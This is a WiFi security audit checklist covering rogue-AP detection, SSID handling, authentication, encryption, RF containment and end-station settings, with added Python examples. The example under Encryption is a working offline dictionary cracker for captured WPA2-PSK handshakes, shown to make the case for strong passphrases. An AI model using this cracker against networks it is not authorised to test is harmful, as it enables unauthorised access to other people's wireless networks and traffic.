Layers-7 Copyright 2012. All Rights Reserved Governance Risk Compliance Proprietary & Confidential www.layers-7.com
WIFI AUDIT CHECKLIST
CHECKLIST
Security Policy for Wifi
Review the WLAN security policy for gaps and confirm that the controls it requires are actually implemented and managed consistently with management's intent.
WLAN Architecture
Do you have a network diagram?
Identify the logical separation of the wired and wireless networks based on the network diagram.
Determine the placement of the access points: do they sit behind the firewall, in a segment separated from the wired LAN?
Who has access to Wifi? (Internal users, external users, or both?)
Is Wifi granted access to the Internet, and if so is that access restricted or filtered?
Is a wireless IDS/IPS deployed to monitor the traffic?
Are Wifi traffic logs (AP, controller and RADIUS logs) stored on a central syslog server?
Are the logs reviewed regularly?
Are access failures (authentication failures, and repeated failures from one client) detected and alerted on?
Detect Rogue Access Points
Scan for unauthorised access points on the network: compare every BSSID seen over the air with the authorised AP inventory from the network diagram. A corporate SSID served by a BSSID that is not in the inventory is a rogue AP or an evil twin.
Check whether a WIDS/WIPS is deployed to monitor for rogue APs continuously; a one-off scan only shows the APs that are active at the time of the audit.
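The inventory comparison described above, as an added example (not part of the original checklist). The scan text is a constructed sample modelled on `iw dev <iface> scan` output (the BSS, freq, capability, signal, SSID, RSN and WPA lines); on a real audit, feed the tool's actual output to parse_iw_scan(). The inventory, BSSIDs and SSID names are likewise assumed values.

```python
"""Rogue AP detection: compare what is seen over the air with the authorised AP inventory."""
import re
from dataclasses import dataclass


@dataclass
class BSS:
    bssid: str
    ssid: str = ""
    freq_mhz: int = 0
    signal_dbm: float = 0.0
    privacy: bool = False   # "Privacy" capability bit set: some encryption (WEP/WPA/WPA2) in use
    rsn: bool = False       # RSN information element present (WPA2)
    wpa: bool = False       # vendor WPA (WPA1/TKIP era) information element present


def parse_iw_scan(text: str) -> list:
    """Extract the fields the audit needs from `iw ... scan` style output."""
    bss_list = []
    cur = None
    for raw in text.splitlines():
        m = re.match(r"BSS ([0-9a-fA-F:]{17})", raw)
        if m:
            cur = BSS(bssid=m.group(1).lower())
            bss_list.append(cur)
            continue
        if cur is None:
            continue
        line = raw.strip()
        if line.startswith("SSID:"):
            cur.ssid = line[len("SSID:"):].strip()
        elif line.startswith("freq:"):
            cur.freq_mhz = int(float(line.split()[1]))
        elif line.startswith("signal:"):
            cur.signal_dbm = float(line.split()[1])
        elif line.startswith("capability:"):
            cur.privacy = "Privacy" in line
        elif line.startswith("RSN:"):
            cur.rsn = True
        elif line.startswith("WPA:"):
            cur.wpa = True
    return bss_list


def classify(bss_list: list, inventory: dict, corporate_ssids: set) -> dict:
    """inventory maps an authorised BSSID to the SSID it is supposed to serve (taken from the
    network diagram or a controller export); corporate_ssids are the SSIDs the organisation owns."""
    verdicts = {}
    for b in bss_list:
        if b.bssid in inventory:
            verdict = ("authorised" if b.ssid == inventory[b.bssid]
                       else "authorised AP serving unexpected SSID %r" % b.ssid)
        elif b.ssid in corporate_ssids:
            # Our SSID from a BSSID we do not own: a rogue AP or an evil twin aimed at our clients.
            verdict = "ROGUE: corporate SSID on unknown BSSID"
            if not b.privacy:
                verdict += " (open, no encryption)"
        else:
            verdict = "unknown: neighbour or rogue, correlate with wired-side MAC tables"
        verdicts[b.bssid] = verdict
    return verdicts


def audit_scan(scan_text: str, inventory: dict, corporate_ssids: set) -> dict:
    return classify(parse_iw_scan(scan_text), inventory, corporate_ssids)


# Constructed sample scan (assumed values, not a real capture).
SAMPLE_SCAN = """\
BSS 00:11:22:aa:bb:01(on wlan0)
    freq: 2412
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -41.00 dBm
    SSID: CorpNet
    RSN:     * Version: 1
         * Group cipher: CCMP
         * Pairwise ciphers: CCMP
         * Authentication suites: IEEE 802.1X
BSS 00:11:22:aa:bb:02(on wlan0)
    freq: 5180
    capability: ESS Privacy (0x0011)
    signal: -55.00 dBm
    SSID: CorpGuest
    RSN:     * Version: 1
BSS c8:3a:35:12:34:56(on wlan0)
    freq: 2437
    capability: ESS ShortSlotTime (0x0401)
    signal: -38.00 dBm
    SSID: CorpNet
BSS 00:1e:58:ab:cd:ef(on wlan0)
    freq: 2462
    capability: ESS Privacy (0x0011)
    signal: -79.00 dBm
    SSID: NETGEAR-2G
    WPA:     * Version: 1
"""
AUTHORISED_APS = {"00:11:22:aa:bb:01": "CorpNet", "00:11:22:aa:bb:02": "CorpGuest"}  # assumed inventory
CORPORATE_SSIDS = {"CorpNet", "CorpGuest"}

if __name__ == "__main__":
    for bssid, verdict in audit_scan(SAMPLE_SCAN, AUTHORISED_APS, CORPORATE_SSIDS).items():
        print(bssid, verdict)
```

The "unknown" verdict is deliberately not "rogue": a neighbour's AP on an unrelated SSID is not on your network. Confirming that an unknown BSSID is actually plugged into your LAN needs the wired side (switch MAC tables, DHCP leases), which is what a WIDS/WIPS correlates continuously.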
SSID Broadcasting
The SSID is visible using a packet sniffer or wireless detection tools from any station within radio range, whether or not it is broadcast in beacons: it is still sent in clear in probe requests, probe responses and association requests.
Disabling SSID broadcast therefore only hides the network from casual discovery and is not an access control; note also that clients configured for a hidden SSID probe for it wherever they are, disclosing the name off-site.
The SSID should be changed from the default and should not identify the company.
Authentication
Use a central authentication server (e.g. a RADIUS server, with 802.1X / WPA2-Enterprise) rather than a single shared key, so that every user authenticates individually and access can be revoked per account.
MAC Address Filtering: check in the AP admin panel whether MAC address filtering is enabled. Treat it as a minor hygiene control only: permitted MAC addresses travel in cleartext frame headers and are trivially spoofed.
Is the DHCP pool restricted, and if so how (e.g. to the expected number of clients)?
Default Configuration
Browse to the AP's IP address to reach the management interface and check whether the default settings have been changed; factory defaults make a wireless network easier to identify and penetrate.
Has the default administrative login/password been changed?
Is the administrative password easily cracked? Check in the AP admin panel.
Are encrypted administrative interfaces available and enforced (e.g. SSH, HTTPS), with Telnet and plain HTTP disabled, and is management reachable only from the wired management network rather than from wireless clients?
Is the AP running the latest firmware and security patches?
Configuration Management: how is it enforced?
How should configuration changes be made, and do they follow the change management process? Review the change management documents.
Encryption
WPA2 with AES-CCMP is the minimum; WEP and WPA/TKIP are broken and must not be used. For corporate networks prefer WPA2-Enterprise (802.1X with RADIUS) over a pre-shared key.
If the AP is using a Pre-Shared Key (PSK), is it easily cracked? A captured 4-way handshake allows an offline dictionary attack on the passphrase, so a short or dictionary-word PSK is weak regardless of WPA2 being used.
Are the encryption keys (the PSK) changed at regular intervals and whenever someone who knows the key leaves the organisation?
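Why a PSK is only as strong as the passphrase, shown as an added example (not from the original checklist): the IEEE 802.11i key derivation and EAPOL-Key MIC check that tools such as aircrack-ng and hashcat implement, run against a constructed handshake. The "captured" handshake is built in-line from a known weak passphrase so the code runs offline; on a real audit the SSID, MAC addresses, nonces and EAPOL-Key message 2 come from a packet capture. The MACs, nonces, SSID and wordlist are assumed values.

```python
"""Offline dictionary attack on a WPA2-PSK 4-way handshake (IEEE 802.11i key derivation)."""
import hashlib
import hmac

# EAPOL header (4) + descriptor type, key info, key length, replay counter, nonce, IV, RSC, ID
# (1+2+2+8+32+16+8+8 = 77): the 16-byte MIC field starts at offset 81 of the EAPOL-Key frame.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter), truncated."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces));
    the first 16 bytes of the PTK are the KCK that keys the EAPOL-Key MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2/4 (RSN descriptor, key info: pairwise + MIC, HMAC-SHA1 version), MIC zeroed."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2, pairwise, key MIC
            + b"\x00\x10"                # key length
            + b"\x00" * 7 + b"\x01"      # replay counter
            + snonce                     # key nonce = SNonce
            + b"\x00" * 16               # key IV
            + b"\x00" * 8                # key RSC
            + b"\x00" * 8                # key ID (reserved)
            + b"\x00" * 16               # key MIC (zeroed for computation)
            + b"\x00\x00")               # key data length (RSN IE omitted in this sample)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def constructed_capture(passphrase: str, ssid: str) -> dict:
    """Build what a sniffer would hand us: addresses, nonces and message 2 with a valid MIC. (Constructed sample.)"""
    aa = bytes.fromhex("001122aabb01")       # assumed AP MAC
    spa = bytes.fromhex("c83a35123456")      # assumed client MAC
    anonce = bytes(range(32))                # placeholder nonces; real ones are random
    snonce = bytes(range(32, 64))
    frame = build_msg2(snonce)
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    mic = eapol_mic(kck, frame)
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]}


def crack_psk(capture: dict, wordlist: list):
    """Return the passphrase whose derived KCK reproduces the captured MIC, or None."""
    frame = capture["eapol"]
    mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = derive_kck(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(kck, frame), mic):
            return candidate
    return None


WORDLIST = ["password", "12345678", "welcome1", "summer2012", "Layers7wifi"]  # assumed tiny wordlist

if __name__ == "__main__":
    print(crack_psk(constructed_capture("summer2012", "CorpNet"), WORDLIST))
```

The cost of each guess is fixed by PBKDF2 (4096 iterations, salted only with the SSID), so the attacker's effort scales with the size of the dictionary, not with WPA2 itself; a passphrase that appears in any wordlist falls immediately, and a default or company-related SSID allows precomputed PMK tables. The audit check is therefore the passphrase's length and randomness, or better, whether the network can move to 802.1X so that no shared secret exists to crack.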
RF Management
APs should be placed so that the signal does not extend beyond the building more than necessary.
Reduce the AP transmit power to limit the signal outside the building.
An omnidirectional antenna radiates in a 360 degree pattern; consider directional antennas to keep the signal out of areas where wireless coverage is not needed. Note that an attacker with a high-gain antenna can still receive a weak signal from well outside the building, so RF containment reduces exposure but does not replace encryption and authentication.
Physical Security
Wireless APs should be mounted in a secure location where the device, its reset button and its Ethernet cabling cannot be tampered with.
User awareness training has to be done at least yearly.
Physical failure of an access point: what is the business impact? What is the continuity plan?
End Station
Is the station running the latest OS and application security patches?
Is current antivirus software running?
Is the wireless interface protected by a personal firewall?
Are potential wireless intrusions (e.g. blocked sessions) being logged?
Is the wireless client willing to associate with ANY network, or with ad hoc networks?
If using 802.1X, is it using a vulnerable EAP type (e.g. LEAP, whose MS-CHAP challenge/response can be cracked offline)? Does the supplicant validate the RADIUS server certificate, so that a rogue AP cannot harvest credentials?
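The last two end-station checks (association with open or ad hoc networks, and the EAP configuration) can be verified from the client's supplicant configuration. As an added example (not part of the original checklist), the following lints a wpa_supplicant.conf for those weaknesses; the configuration text is a constructed sample with assumed SSIDs, paths and credentials, not a real deployment.

```python
"""Lint wpa_supplicant.conf network blocks for the end-station weaknesses in the checklist."""
import re

TLS_BASED_EAP = {"PEAP", "TTLS", "TLS", "FAST"}   # EAP methods that authenticate the server by certificate


def parse_networks(conf: str) -> list:
    """Return one dict of key=value settings per network={ ... } block."""
    nets = []
    for body in re.findall(r"network\s*=\s*\{([^}]*)\}", conf):
        net = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            net[key.strip()] = value.strip().strip('"')
        nets.append(net)
    return nets


def audit_network(net: dict) -> list:
    """Findings for one network block, in checklist order."""
    findings = []
    key_mgmt = set(net.get("key_mgmt", "WPA-PSK WPA-EAP").split())  # wpa_supplicant's default
    eap = net.get("eap", "").upper()
    if "NONE" in key_mgmt:
        findings.append("WEP: broken, treat as cleartext" if "wep_key0" in net
                        else "open network, no encryption")
    if net.get("mode") == "1":
        findings.append("ad hoc (IBSS) network")
    if net.get("proto") == "WPA" or "TKIP" in net.get("pairwise", ""):
        findings.append("WPA/TKIP cipher, use WPA2 CCMP")
    if eap == "LEAP":
        findings.append("LEAP: MS-CHAP challenge/response crackable offline")
    elif eap in TLS_BASED_EAP:
        if "ca_cert" not in net:
            findings.append("no ca_cert: RADIUS server certificate not validated, credentials can be harvested by a rogue AP")
        elif not any(k in net for k in ("domain_suffix_match", "domain_match", "subject_match")):
            findings.append("ca_cert set but no server name check: any certificate from that CA is accepted")
    return findings


def audit_config(conf: str) -> dict:
    return {net.get("ssid", "<no ssid>"): audit_network(net) for net in parse_networks(conf)}


# Constructed sample configuration (assumed values).
SAMPLE_CONF = """
ctrl_interface=/var/run/wpa_supplicant
network={
    ssid="CorpNet"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="CorpNet-legacy"
    key_mgmt=WPA-EAP
    eap=LEAP
    identity="jdoe"
    password="hunter2"
}
network={
    ssid="Hotel-WiFi"
    key_mgmt=NONE
}
network={
    ssid="share-adhoc"
    mode=1
    key_mgmt=NONE
}
network={
    ssid="OldOffice"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-ca.pem"
    # no domain_suffix_match
}
"""

if __name__ == "__main__":
    for ssid, findings in audit_config(SAMPLE_CONF).items():
        print(ssid, findings or ["ok"])
```

The CorpNet block is the reference configuration: a tunnelled EAP method, a pinned CA and a server name match, so a rogue AP with a RADIUS server of its own cannot complete the tunnel and collect the MS-CHAPv2 exchange. Every other block reproduces one of the checklist's failure modes.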